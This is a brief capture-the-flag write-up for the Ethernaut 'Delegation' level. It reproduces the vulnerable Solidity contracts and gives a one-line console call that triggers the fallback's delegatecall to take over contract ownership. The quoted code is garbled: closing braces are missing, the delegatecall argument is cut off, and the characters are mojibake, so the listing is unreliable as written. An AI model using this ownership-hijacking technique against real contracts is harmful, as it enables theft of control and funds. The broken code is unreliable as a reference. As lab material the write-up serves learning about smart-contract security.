Ethernaut - 6. Delegation

Difficulty: ๐ŸŒ•๐ŸŒ•๐ŸŒ‘๐ŸŒ‘๐ŸŒ‘

The goal of this level is for you to claim ownership of the instance you are given.

Things that might help

  • Look into Solidityโ€™s documentation on the delegatecall low level function, how it works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
  • Fallback methods
  • Method ids


// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Delegate {

  address public owner;

  constructor(address _owner) public {
    owner = _owner;

  function pwn() public {
    owner = msg.sender;

contract Delegation {

  address public owner;
  Delegate delegate;

  constructor(address _delegateAddress) public {
    delegate = Delegate(_delegateAddress);
    owner = msg.sender;

  fallback() external {
    (bool result,) = address(delegate).delegatecall(;
    if (result) {


  1. Get new Instance.
  2. Call the method
    await contract.sendTransaction({data: web3.eth.abi.encodeFunctionSignature("pwn()")})

    You can find the detail about encodeFunctionSignature() in there .

  3. Submit instance ฮพ( โœฟ๏ผžโ—กโ›)


Solidity by example - delegatecall